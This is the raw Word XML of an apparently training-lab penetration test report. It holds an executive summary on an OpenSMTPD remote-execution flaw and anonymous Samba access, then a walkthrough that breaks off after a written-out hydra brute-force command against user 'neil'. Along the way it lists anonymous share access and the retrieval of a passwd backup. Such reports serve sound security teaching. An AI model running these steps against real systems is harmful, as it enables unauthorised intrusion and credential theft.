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D7BB8" w14:textId="5FDC1DE1" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="1A731E54" w14:textId="4D5F2AF8" w:rsidR="006D1C15" w:rsidRDefault="006D1C15"/>
    <w:p w14:paraId="57005D9C" w14:textId="44140AA1" w:rsidR="006D1C15" w:rsidRDefault="006D1C15"/>
    <w:p w14:paraId="4FE89DFA" w14:textId="2A015158" w:rsidR="006D1C15" w:rsidRDefault="006D1C15"/>
    <w:p w14:paraId="0F9A686D" w14:textId="77777777" w:rsidR="006D1C15" w:rsidRDefault="006D1C15"/>
    <w:p w14:paraId="4A476886" w14:textId="37E2AA3E" w:rsidR="002E6D4C" w:rsidRDefault="003C61DA" w:rsidP="006D1C15">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DA9CDA4" wp14:editId="2E27645C">
            <wp:extent cx="5943600" cy="3917950"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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0884" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="6E68B5EE" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="3B7A4671" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="0FC4E404" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="44ECDCF7" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="0405511F" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="04AE35CC" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="3ABA1D66" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="461D3776" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="24902D36" w14:textId="566D5245" w:rsidR="002E6D4C" w:rsidRDefault="00437703">
      <w:r>
        <w:t>Penetration Tester: Giovanni Ocasio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B59EA2" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="76CE2408" w14:textId="64FECAD8" w:rsidR="002E6D4C" w:rsidRPr="00437703" w:rsidRDefault="00437703" w:rsidP="00437703">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00437703">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E2160D" w14:textId="21751FCF" w:rsidR="00437703" w:rsidRDefault="004200C4">
      <w:r>
        <w:t xml:space="preserve">During the penetration test </w:t>
      </w:r>
      <w:r w:rsidR="0037521E">
        <w:t>one</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="0037521E">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> w</w:t>
      </w:r>
      <w:r w:rsidR="0037521E">
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> discovered which ultimately led to</w:t>
      </w:r>
      <w:r w:rsidR="00FA5B64">
        <w:t xml:space="preserve"> the penetration tester gaining elevated privileges on the targeted system. When initially scanning the </w:t>
      </w:r>
      <w:r w:rsidR="00B518A6">
        <w:t>machine,</w:t>
      </w:r>
      <w:r w:rsidR="00FA5B64">
        <w:t xml:space="preserve"> it was determined </w:t>
      </w:r>
      <w:r w:rsidR="00B518A6">
        <w:t>that the Secure Shell</w:t>
      </w:r>
      <w:r w:rsidR="0037521E">
        <w:t xml:space="preserve"> service</w:t>
      </w:r>
      <w:r w:rsidR="00B518A6">
        <w:t xml:space="preserve"> on TCP Port 22</w:t>
      </w:r>
      <w:r w:rsidR="0037521E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B518A6">
        <w:t xml:space="preserve"> Hypertext Trans</w:t>
      </w:r>
      <w:r w:rsidR="0016741F">
        <w:t>fer</w:t>
      </w:r>
      <w:r w:rsidR="00B518A6">
        <w:t xml:space="preserve"> Protocol</w:t>
      </w:r>
      <w:r w:rsidR="0016741F">
        <w:t xml:space="preserve"> on TCP </w:t>
      </w:r>
      <w:r w:rsidR="00D357ED">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="0016741F">
        <w:t>ort 80</w:t>
      </w:r>
      <w:r w:rsidR="0037521E">
        <w:t>, Simple Mail Transfer Protocol on TCP Port 25</w:t>
      </w:r>
      <w:r w:rsidR="00635E0D">
        <w:t>, and a SAMBA server running on TCP Port 445</w:t>
      </w:r>
      <w:r w:rsidR="0016741F">
        <w:t xml:space="preserve"> was discovered.</w:t>
      </w:r>
      <w:r w:rsidR="00D357ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D71806">
        <w:t>The major vulnerability discovered was CVE-</w:t>
      </w:r>
      <w:r w:rsidR="002A5847">
        <w:t>2020</w:t>
      </w:r>
      <w:r w:rsidR="00D71806" w:rsidRPr="00D71806">
        <w:t>-7</w:t>
      </w:r>
      <w:r w:rsidR="007B41A7">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="002A5847">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="007B41A7">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00D71806">
        <w:t>, which refers to</w:t>
      </w:r>
      <w:r w:rsidR="007B41A7">
        <w:t xml:space="preserve"> a vulnerability in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B41A7">
        <w:t>OpenSMTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B41A7">
        <w:t xml:space="preserve"> that allows </w:t>
      </w:r>
      <w:r w:rsidR="00DA181D">
        <w:t>an attacker to execute commands remotely</w:t>
      </w:r>
      <w:r w:rsidR="00AB1581">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DA181D">
        <w:t xml:space="preserve"> After discovering that the target system was running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DA181D">
        <w:t>OpenSMTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DA181D">
        <w:t xml:space="preserve"> the penetration tester was able to determine that the system was vulnerable to CVE-2020-7247. </w:t>
      </w:r>
      <w:r w:rsidR="00290949">
        <w:t xml:space="preserve">He was then able to use a python script that created a reverse shell allow them to gain elevated access to the </w:t>
      </w:r>
      <w:r w:rsidR="00BF6E4F">
        <w:t xml:space="preserve">target machine. Other findings include the ability to anonymously access the SMB share </w:t>
      </w:r>
      <w:r w:rsidR="008A1A63">
        <w:t>(CVE-2016-</w:t>
      </w:r>
      <w:r w:rsidR="00D070B6">
        <w:t>9463</w:t>
      </w:r>
      <w:r w:rsidR="008A1A63">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D070B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF6E4F">
        <w:t>which contain</w:t>
      </w:r>
      <w:r w:rsidR="000B2330">
        <w:t xml:space="preserve">ed a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000B2330">
        <w:t>passwd.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000B2330">
        <w:t xml:space="preserve"> file. Upon further investigation it was discovered that this backup file </w:t>
      </w:r>
      <w:r w:rsidR="00090ABF">
        <w:t>was a copy of the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00090ABF">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00090ABF">
        <w:t>/passwd file which contains user account names which can be used in a brute force attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3657DE92" w14:textId="64026872" w:rsidR="00577D33" w:rsidRDefault="00577D33"/>
    <w:p w14:paraId="4B6DBC59" w14:textId="48C58BA4" w:rsidR="00577D33" w:rsidRDefault="00577D33" w:rsidP="00577D33">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DBD943" w14:textId="77777777" w:rsidR="00DB0A79" w:rsidRDefault="006103C8" w:rsidP="00577D33">
      <w:r>
        <w:t xml:space="preserve">Update the SMTP server to </w:t>
      </w:r>
      <w:r w:rsidR="00DB0A79">
        <w:t>a more secure version or apply necessary patches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A3656" w14:textId="78DA25C0" w:rsidR="00604354" w:rsidRDefault="00014AE1" w:rsidP="00577D33">
      <w:r>
        <w:t xml:space="preserve">Disable the </w:t>
      </w:r>
      <w:r w:rsidR="00A86594">
        <w:t xml:space="preserve">Anonymous login for the SAMBA server. Also restrict access to the “backups” </w:t>
      </w:r>
      <w:r w:rsidR="00CC0F67">
        <w:t>share</w:t>
      </w:r>
      <w:r w:rsidR="00A86594">
        <w:t xml:space="preserve"> on the share to </w:t>
      </w:r>
      <w:r w:rsidR="00CC0F67">
        <w:t>only those who require access. Finally, consider encrypting the contents of the “backups” share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348DFE89" w14:textId="77777777" w:rsidR="00455B50" w:rsidRPr="00577D33" w:rsidRDefault="00455B50" w:rsidP="00577D33"/>
    <w:p w14:paraId="0ECE3C08" w14:textId="18E1CAF6" w:rsidR="00437703" w:rsidRDefault="00437703"/>
    <w:p w14:paraId="293400DB" w14:textId="4B11A1F5" w:rsidR="00437703" w:rsidRDefault="00437703"/>
    <w:p w14:paraId="7E7F0A05" w14:textId="6AB04FBC" w:rsidR="00437703" w:rsidRDefault="00437703"/>
    <w:p w14:paraId="08EFCB1F" w14:textId="72502659" w:rsidR="00437703" w:rsidRDefault="00437703"/>
    <w:p w14:paraId="07DC061E" w14:textId="77777777" w:rsidR="00437703" w:rsidRDefault="00437703"/>
    <w:p w14:paraId="5BA4D819" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="38258E77" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="4405FAC6" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="1F5C2C3C" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="2D6EE1B1" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="38475A31" w14:textId="77777777" w:rsidR="002E6D4C" w:rsidRDefault="002E6D4C"/>
    <w:p w14:paraId="4424F184" w14:textId="6E6E5240" w:rsidR="00705ED9" w:rsidRDefault="00705ED9"/>
    <w:p w14:paraId="19564E33" w14:textId="1F02B234" w:rsidR="00E91175" w:rsidRDefault="00E91175"/>
    <w:p w14:paraId="457B26CB" w14:textId="208C128A" w:rsidR="00E91175" w:rsidRDefault="00E91175"/>
    <w:p w14:paraId="38AFF4FA" w14:textId="25418361" w:rsidR="00E91175" w:rsidRDefault="00E91175">
      <w:r>
        <w:t xml:space="preserve">Once in the environment, I begin with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">command to determine the </w:t>
      </w:r>
      <w:r w:rsidR="007008D2">
        <w:t xml:space="preserve">internal IP address range. Afterwards, I utilize a tool called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007008D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007008D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007008D2">
        <w:t>which sends out ARP request to</w:t>
      </w:r>
      <w:r w:rsidR="00613215">
        <w:t xml:space="preserve"> determine what physical address is associated with a particular network address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D59E10D" w14:textId="4F3B3C03" w:rsidR="00613215" w:rsidRDefault="00613215">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="353A1A45" wp14:editId="64F4E960">
            <wp:extent cx="4924425" cy="3918495"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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38" cy="39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34FD" w14:textId="5BAB563C" w:rsidR="006C62D2" w:rsidRDefault="00DE1164">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We discover two host</w:t>
      </w:r>
      <w:r w:rsidR="006C62D2">
        <w:t>s.</w:t>
      </w:r>
      <w:r w:rsidR="006C62D2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69A9705A" wp14:editId="35821D50">
            <wp:extent cx="4924425" cy="3235600"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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565" cy="32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2346" w14:textId="20CCB249" w:rsidR="00072D62" w:rsidRDefault="00A94974">
      <w:r>
        <w:t>We know that t</w:t>
      </w:r>
      <w:r w:rsidR="00072D62">
        <w:t>he 192.168.65.254</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP address refers to our DNS server, making the 192.168.65.</w:t>
      </w:r>
      <w:r w:rsidR="00DB4ABB">
        <w:t xml:space="preserve">71 IP address our target machine. With that information, we can begin with </w:t>
      </w:r>
      <w:r w:rsidR="001E3203">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00DB4ABB">
        <w:t xml:space="preserve"> nmap scan.</w:t>
      </w:r>
      <w:r w:rsidR="001E3203">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0063245C">
        <w:t xml:space="preserve">We run </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0063245C">
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0063245C">
        <w:t xml:space="preserve"> nmap scan using</w:t>
      </w:r>
      <w:r w:rsidR="00172E47">
        <w:t xml:space="preserve"> several flags,</w:t>
      </w:r>
      <w:r w:rsidR="0063245C">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00172E47">
        <w:t xml:space="preserve">-sV flag which </w:t>
      </w:r>
      <w:r w:rsidR="005039B3">
        <w:t xml:space="preserve">determines the service version running on the machine, the -p- flag which scans all 65535 ports for any services running, and the -A flag which runs several scripts for determining the operating system, common vulnerabilities, etc. We then have it output to a text file </w:t>
      </w:r>
      <w:r w:rsidR="00631B07">
        <w:t xml:space="preserve">called “nmap.txt” for easy review </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00631B07">
        <w:t>later on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00631B07">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0673E" w14:textId="5579723E" w:rsidR="00631B07" w:rsidRDefault="00631B07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F208DEA" wp14:editId="6C624437">
            <wp:extent cx="4962525" cy="1184910"/>
            <wp:effectExtent l="0" t="0" r="952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22C2" w14:textId="7650302C" w:rsidR="005D1CAD" w:rsidRDefault="00C94722">
      <w:r>
        <w:t>The output shows that Secure Shell is open on port 22 which can allow us to access the machine if we can obtain proper credentials</w:t>
      </w:r>
      <w:r w:rsidR="00CB50F0">
        <w:t>. It also shows SMTP on port 25 which is a mail service, Port 53 is open which is commonly used for DNS, Port 80 running HTTP which usually means the system is hosting a website</w:t>
      </w:r>
      <w:r w:rsidR="005D1CAD">
        <w:t>, and Port 445 which is hosting a SAMBA file share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F099341" w14:textId="151B6414" w:rsidR="005039B3" w:rsidRDefault="005D1CAD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56DB155A" wp14:editId="5B126CD8">
            <wp:extent cx="5000625" cy="4390933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379" cy="439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0F0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716B698E" w14:textId="77777777" w:rsidR="00D97851" w:rsidRDefault="00B3471B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>I’ll</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> begin with the SAMBA file share and test for anonymous login functionality</w:t>
      </w:r>
      <w:r w:rsidR="0050729B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000D039E">
        <w:t xml:space="preserve">I can do this by using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D039E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D039E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D039E">
        <w:t>which allows me to connect to the SMB or SAMBA server.</w:t>
      </w:r>
      <w:r w:rsidR="005346AE">
        <w:t xml:space="preserve"> The command </w:t>
      </w:r>
      <w:r w:rsidR="00D97851">
        <w:t xml:space="preserve">we will use is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D97851">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D97851">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -L 192.168.65.71. </w:t>
      </w:r>
      <w:r w:rsidR="00D97851">
        <w:t>The -L will list out the contents of the file share if we can access it anonymously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46565BC1" w14:textId="230C7C3C" w:rsidR="00DB4ABB" w:rsidRDefault="00A64CBD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C2F9A9B" wp14:editId="3CB259B1">
            <wp:extent cx="5048250" cy="1849755"/>
            <wp:effectExtent l="0" t="0" r="0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851">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179658DC" w14:textId="5A5F2A62" w:rsidR="00975168" w:rsidRPr="00DA3388" w:rsidRDefault="005B6D60">
      <w:r>
        <w:t xml:space="preserve">We see that we can anonymously </w:t>
      </w:r>
      <w:r w:rsidR="00DA3388">
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the SAMBA share</w:t>
      </w:r>
      <w:r w:rsidR="006A0EA3">
        <w:t xml:space="preserve">, so </w:t>
      </w:r>
      <w:r w:rsidR="00F90858">
        <w:t>we will</w:t>
      </w:r>
      <w:r w:rsidR="006A0EA3">
        <w:t xml:space="preserve"> use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A0EA3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A0EA3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A0EA3">
        <w:t>again</w:t>
      </w:r>
      <w:r w:rsidR="00F90858">
        <w:t xml:space="preserve">. The command we will use this time is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F90858">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F90858">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00DA3388" w:rsidRPr="009F79F5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>\\\\192.168.65.71\\backups</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00975168">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DA3388">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA3388">
        <w:t>This will allow us to view the contents of the backups share.</w:t>
      </w:r>
      <w:r w:rsidR="003D6910">
        <w:t xml:space="preserve"> When we list out the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003D6910">
        <w:t>contents</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003D6910">
        <w:t xml:space="preserve"> we can see a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D6910">
        <w:t>passwd.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D6910">
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3106D194" w14:textId="514AF88F" w:rsidR="00FF2EFC" w:rsidRDefault="00975168">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D6910">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3784D7B1" wp14:editId="4613AA5A">
            <wp:extent cx="5067300" cy="2190750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F6F5" w14:textId="77777777" w:rsidR="008C4E18" w:rsidRDefault="000335D8">
      <w:r>
        <w:t xml:space="preserve">Now, we will use the </w:t>
      </w:r>
      <w:r w:rsidR="005378F4" w:rsidRPr="006C36E1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mget</w:t>
      </w:r>
      <w:r w:rsidR="006C36E1">
        <w:t xml:space="preserve"> command </w:t>
      </w:r>
      <w:r w:rsidR="008C4E18">
        <w:t>to copy the file to our local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442E5C44" w14:textId="6A5D8FB3" w:rsidR="000335D8" w:rsidRDefault="008C4E18">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0452C647" wp14:editId="1D6C9A06">
            <wp:extent cx="5114925" cy="1249045"/>
            <wp:effectExtent l="0" t="0" r="9525" b="825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8F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225EB6B9" w14:textId="049A9723" w:rsidR="008C4E18" w:rsidRDefault="00D16246">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Let’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> get out of the SAMBA share and try to view the contents of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwd</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D98">
        <w:t>.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r w:rsidR="004B65EB">
        <w:t xml:space="preserve">. We can view the contents using the </w:t>
      </w:r>
      <w:r w:rsidR="004B65EB" w:rsidRPr="004B65EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidR="004B65EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B65EB">
        <w:t xml:space="preserve">command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A4D848" w14:textId="48297F45" w:rsidR="00975E15" w:rsidRDefault="00975E15">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A34E392" wp14:editId="5501FBE6">
            <wp:extent cx="5249040" cy="4514850"/>
            <wp:effectExtent l="0" t="0" r="889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857" cy="453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564D" w14:textId="56B42046" w:rsidR="00975E15" w:rsidRDefault="00975E15">
      <w:r>
        <w:t xml:space="preserve">Within this file we find a user named </w:t>
      </w:r>
      <w:r w:rsidR="008C5BC3">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ne</w:t>
      </w:r>
      <w:r w:rsidR="00A75D3E">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C5BC3">
        <w:t xml:space="preserve">’. With this user account </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008C5BC3">
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008C5BC3">
        <w:t xml:space="preserve"> we can attempt to brute force </w:t>
      </w:r>
      <w:r w:rsidR="00FB7525">
        <w:t>into the user’s account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4403D73F" w14:textId="5747086D" w:rsidR="0024779D" w:rsidRDefault="0024779D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61BE5D55" wp14:editId="4013CC63">
            <wp:extent cx="5248910" cy="695325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261F" w14:textId="4133F92D" w:rsidR="00A75D3E" w:rsidRDefault="00A75D3E">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can </w:t>
      </w:r>
      <w:r w:rsidR="00CE0134">
        <w:t xml:space="preserve">conduct the brute force using a tool called hydra. The command will be </w:t>
      </w:r>
      <w:r w:rsidR="00CE0134">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE0134">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>neil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE0134">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -P /usr/share/Metasploit-Framework/data/wordlists/</w:t>
      </w:r>
      <w:r w:rsidR="00D01075">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:r w:rsidR="001B4509">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00D01075">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>passwords.txt</w:t>
      </w:r>
      <w:r w:rsidR="001B4509">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EB1894" w14:textId="30DB1D6A" w:rsidR="00140FD6" w:rsidRDefault="00140FD6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15F1B35D" wp14:editId="09F25608">
            <wp:extent cx="5305425" cy="256209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817" cy="256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414D" w14:textId="3212719D" w:rsidR="00976831" w:rsidRDefault="00B1566C">
